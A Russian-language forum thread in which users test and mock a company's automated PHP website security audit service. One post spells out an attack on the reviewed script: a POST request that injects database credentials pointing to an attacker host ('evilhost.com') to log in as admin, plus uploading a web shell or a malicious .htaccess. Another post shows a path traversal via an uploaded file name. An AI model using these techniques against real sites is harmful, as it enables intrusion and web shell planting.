Проводим аудит безопасности сайтов

123 4
Y
На сайте с 13.09.2010
Offline
5
#11

В вашем коде есть два момента, которые больше относятся к багам разрабочкика, нежели к уязвимостям.

1. Выполняется проверка

if(is_uploaded_file($_FILES['file']['tmp_name']))

где $_FILES['file']['tmp_name'] - содержит путь ко времеенному файлу загруженному на сервер,

после чего идет попытка скопировать не загруженный файл, а его изначальное название на компьютере клиента.

move_uploaded_file($_FILES['file']['name'], "uploads/".$_FILES['file']['name']); 

Это нельзя назвать уязвимостью, т.к. move_uploaded_file может копировать лишь те файлы которые были загруженны от имени процесса php, таким образом даже указав имя файла напимер "/etc/passwd" ничего не произойдет.

2. Хранение хэша паролей в базе без соли

if($_utmp['password'] == md5($password)){ 
Британские ученые доказали, что прививки предупреждают болезни.
B
На сайте с 21.12.2009
Offline
28
#12

я изменю код по поводу первого пункта, просто когда редактировал нечайно допустил косяк.

move_uploaded_file($_FILES['file']['name'], "uploads/".$_FILES['file']['name']);

на

move_uploaded_file($_FILES['file']['tmp_name'], "uploads/".$_FILES['file']['name']);

значит ли что храние хеша без соли является единственным багом ?

то есть в остальном код безопасен ?

Адский Кодер Разработка и аудит безопасности сайтов/скриптов(PHP+MySQL) (/ru/forum/530575)
Y
На сайте с 13.09.2010
Offline
5
#13
я изменю код по поводу первого пункта, просто когда редактировал нечайно допустил косяк.
move_uploaded_file($_FILES['file']['name'], "uploads/".$_FILES['file']['name']);
на
move_uploaded_file($_FILES['file']['tmp_name'], "uploads/".$_FILES['file']['name']);

После такого изменения этот вызов становится уязвимым. Если название файла будет к примеру таким "../../.htaccess". В остальном коде уязвимостей нет.

B
На сайте с 21.12.2009
Offline
28
#14

Ну тогда получайте ложку дегтя.

POST script.php?db_user=eviluser&db_pass=evilpass&db_host=evilhost.com&db_name=somename&user=admin&password=adminpass

где evilhost.com содержит открытый во внешку мускул с БД somename, в ней таблицей user , и записью admin:adminpass:1 ну вы поняли я думаю.

И в этот же запрос пихаем отправку файла, к примеру shell.php.doc или как вы сказали .htaccess с кодом для исполнения gif как php, или что то типа shtml.

Не думаю что после такого анализа, код любой другой CMS после вашей проверки будет 100% безопастным.

Y
На сайте с 13.09.2010
Offline
5
#15

Да вы правы, эту уязвимость программа не обнаружила. Однако хочу сказать следующее. Не бывает программ дающих 100% результат, работающих на эвристиках. Это как антивирусы - спасают в 99% случаев, значительно уменьшая риски.

YESAudit добавил 15.09.2010 в 00:00

Гарантировать 100% безопасность увы не сможет ни одна компания занимающася услугами веб аудита. Мы готовы провести аудит любого веб сайта (с PR>=4) ровно за ту стоимость, в которую вы сами оцените результаты выполенных нами работ.

B
На сайте с 21.12.2009
Offline
28
#16

Резюмирую . лучшая программа в голове.

Учитесь ей работать, а не программами.

p.ss Если уж глобализацию пропустила, то про ошибки логики говорить нечего

dkameleon
На сайте с 09.12.2005
Offline
386
#17
YESAudit:
Да вполне. Вы можете отправить нам любой файл скрипта добавив в него несколько уязвимостей, а мы запустив анализатор продемонстрируем вам полученный от него ответ.

меня опередили и уже показали недочеты вашей программы.

К сожалению, пока программы глупее человека.

Как резюме: у вас заказывать может и не дорого, но бесполезно :)

Дизайн интерьера (http://balabukha.com/)
Anarchist
На сайте с 23.07.2008
Offline
185
#18

Качество на уровне XSpider

kxk
На сайте с 30.01.2005
Offline
990
kxk
#19

Anarchist, Похуже

Ваш DEVOPS
Y
На сайте с 13.09.2010
Offline
5
#20

kxk, Удивляюсь вам, вы видели, щупали наш продукт? Готовим видео презентацию, в ближайшие дни сможете оценить работу нашего анализатора. Он на голову выше всех black box пауков типа XSpider и еже с сним.

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий